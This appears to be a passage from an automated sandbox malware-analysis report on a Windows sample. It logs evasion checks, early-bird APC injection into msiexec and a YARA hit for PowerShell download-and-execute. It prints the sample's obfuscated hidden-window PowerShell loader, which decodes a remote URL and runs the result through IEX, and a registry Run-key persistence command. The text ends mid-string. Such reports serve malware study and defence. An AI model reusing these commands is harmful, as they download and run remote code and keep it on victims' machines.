                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6439Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3433Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7655Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2040Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1720Thread sleep count: 3434 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 980Thread sleep count: 168 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 980Thread sleep time: -504000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 980Thread sleep count: 5345 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 980Thread sleep time: -16035000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3434 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22`D
                Source: powershell.exe, 00000002.00000002.1830962562.00000272A8770000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.0000000008906000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_7128.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A60000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#pseudobegivenhedens implume tehsildar indskudsbrt burreskrmenes #>;$pligtmenneskers='solfegens';<#splenomegalia muoniums plateauing endomitosis anisidin uncial #>;$chromoisomerism=$pediculus+$host.ui; function dtente($sizier){if ($chromoisomerism) {$brugeradgangskodernes++;}$trangam=$bedighted34+$sizier.'length'-$brugeradgangskodernes; for( $john=4;$john -lt $trangam;$john+=5){$tremplin=$john;$okkupationsmagters+=$sizier[$john];$nucleolocentrosome='sodavander';}$okkupationsmagters;}function trindt94($confluxes){ & ($afhjemledes) ($confluxes);}$silicomethane=dtente 'strim sliopaa,ztraniun.tldirel ena non/sand ';$silicomethane+=dtente 'term5,che.st c0 oo temp( eknwth.nif yvnforad toporeitwunwis ann flopnpur tmilh far1bill0cryp.smad0c no;lage ajowlisti h.on ent6fors4 tri;byr. slixsi,d6.eso4sp n; inc radirwillvhyp :kalm1 min3.ege1resp.dvrg0 pas)laes sufg re eb,erc aktk rucoephe/atry2af.t0 met1stri0 ens0 beh1iled0gips1 non kur,fin.kityderforeeaandfengeokommxafsv/jeop1 ant3stif1skov.kifs0 .nt ';$reunify=dtente 'prisuarbesgelsecrysrselv-se iamarlgun ee yden inltumis ';$geophones=dtente 'cytohmiratsalststr p sy s di : for/font/dngep mo.lcampi a,tek bblfl,ntrecodun.e.bindtweirokantpunpl/taasmnatiicounse.emoalkageartyterrnunstibyg ss amtte.tsobno.overptemifstram b y ';$ancienty=dtente 'udgi> out ';$afhjemledes=dtente 'laboicrese na xh.nd ';$afmarchernes='militre';$glendon='\overtidsbetalings.del';trindt94 (dtente 'udpe$ yvgafdrl suloextrb mpaove l ods:eskar yanowedgo ,oss n netarc1lane1gaas0ansk=lati$sma ei dens.orv en,:restabrugppustpadfrd enuabetitl ciaarge+pre $spergmod lgueregeocnbe ydungao,rannmidt ');trindt94 (dtente ' opl$eftegad ilsistonrrebh lva ovelr,ig:ungeurecanunprdfutuefungt nduerigerher.iste.opardr mera atat my.ideconinlegpatr= far$ ming grue uldo sn.p lokh afvolag,novere autsskri.t.vosplaip ma.lencoiambutpros( han$nonraavenntambcan,si uptebrutn,ravt friywfru) plo ');trindt94 (dtente ' atr[ onenin,resi itcamb.nonfsspl efrilrsquevovericarocefteesektp p iotogsi p.tnudvltskovmacetapre nek.ea sungjahvebetersove] k,y:scle:srt scharehj tcforbuapperrensidefet sibymatrpgarircandoklimt rtwogravcistiodichlkrab ind = co ove [overn mpae.rest ce..larystince ranc auru thwrfluoiadrat takyedifpmedirstupo kont pilosanectr lobukslkilotdiasyinkvp uae gra]g,os: eri:pretts bolery sdisk1kr d2rev, ');$geophones=$undeteriorating[0];$kniplens=(dtente 'lset$skv,gforslbilfofr sb manam dsl cat: .abgba.iep nes romt br,udesis eae arsr rennvrtreform= ren sile ccmwudla-inflo nonb rinjhesteb nbcvrkstkupf bro su gayo slsnomota.ciekatem sup.affonrackeintetembo.paraw hore.ndsbunclc billaflvicarbe r.gnflo tdeb, ');trindt94 ($kniplens);trindt94 (dtente 'epor$recegsodaeva is,reet oveulap,spa aemo,irtyngnrealejord.su,thporte choa twidemsce nonraftvskera[eloi$tobarrengeter ukononsaddipostfs,ntytal ] niv=anse$skaksspinigennl ma i co,ceffoo nonmp,roe mectbredh lfmanonenwr
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#pseudobegivenhedens implume tehsildar indskudsbrt burreskrmenes #>;$pligtmenneskers='solfegens';<#splenomegalia muoniums plateauing endomitosis anisidin uncial #>;$chromoisomerism=$pediculus+$host.ui; function dtente($sizier){if ($chromoisomerism) {$brugeradgangskodernes++;}$trangam=$bedighted34+$sizier.'length'-$brugeradgangskodernes; for( $john=4;$john -lt $trangam;$john+=5){$tremplin=$john;$okkupationsmagters+=$sizier[$john];$nucleolocentrosome='sodavander';}$okkupationsmagters;}function trindt94($confluxes){ & ($afhjemledes) ($confluxes);}$silicomethane=dtente 'strim sliopaa,ztraniun.tldirel ena non/sand ';$silicomethane+=dtente 'term5,che.st c0 oo temp( eknwth.nif yvnforad toporeitwunwis ann flopnpur tmilh far1bill0cryp.smad0c no;lage ajowlisti h.on ent6fors4 tri;byr. slixsi,d6.eso4sp n; inc radirwillvhyp :kalm1 min3.ege1resp.dvrg0 pas)laes sufg re eb,erc aktk rucoephe/atry2af.t0 met1stri0 ens0 beh1iled0gips1 non kur,fin.kityderforeeaandfengeokommxafsv/jeop1 ant3stif1skov.kifs0 .nt ';$reunify=dtente 'prisuarbesgelsecrysrselv-se iamarlgun ee yden inltumis ';$geophones=dtente 'cytohmiratsalststr p sy s di : for/font/dngep mo.lcampi a,tek bblfl,ntrecodun.e.bindtweirokantpunpl/taasmnatiicounse.emoalkageartyterrnunstibyg ss amtte.tsobno.overptemifstram b y ';$ancienty=dtente 'udgi> out ';$afhjemledes=dtente 'laboicrese na xh.nd ';$afmarchernes='militre';$glendon='\overtidsbetalings.del';trindt94 (dtente 'udpe$ yvgafdrl suloextrb mpaove l ods:eskar yanowedgo ,oss n netarc1lane1gaas0ansk=lati$sma ei dens.orv en,:restabrugppustpadfrd enuabetitl ciaarge+pre $spergmod lgueregeocnbe ydungao,rannmidt ');trindt94 (dtente ' opl$eftegad ilsistonrrebh lva ovelr,ig:ungeurecanunprdfutuefungt nduerigerher.iste.opardr mera atat my.ideconinlegpatr= far$ ming grue uldo sn.p lokh afvolag,novere autsskri.t.vosplaip ma.lencoiambutpros( han$nonraavenntambcan,si uptebrutn,ravt friywfru) plo ');trindt94 (dtente ' atr[ onenin,resi itcamb.nonfsspl efrilrsquevovericarocefteesektp p iotogsi p.tnudvltskovmacetapre nek.ea sungjahvebetersove] k,y:scle:srt scharehj tcforbuapperrensidefet sibymatrpgarircandoklimt rtwogravcistiodichlkrab ind = co ove [overn mpae.rest ce..larystince ranc auru thwrfluoiadrat takyedifpmedirstupo kont pilosanectr lobukslkilotdiasyinkvp uae gra]g,os: eri:pretts bolery sdisk1kr d2rev, ');$geophones=$undeteriorating[0];$kniplens=(dtente 'lset$skv,gforslbilfofr sb manam dsl cat: .abgba.iep nes romt br,udesis eae arsr rennvrtreform= ren sile ccmwudla-inflo nonb rinjhesteb nbcvrkstkupf bro su gayo slsnomota.ciekatem sup.affonrackeintetembo.paraw hore.ndsbunclc billaflvicarbe r.gnflo tdeb, ');trindt94 ($kniplens);trindt94 (dtente 'epor$recegsodaeva is,reet oveulap,spa aemo,irtyngnrealejord.su,thporte choa twidemsce nonraftvskera[eloi$tobarrengeter ukononsaddipostfs,ntytal ] niv=anse$skaksspinigennl ma i co,ceffoo nonmp,r
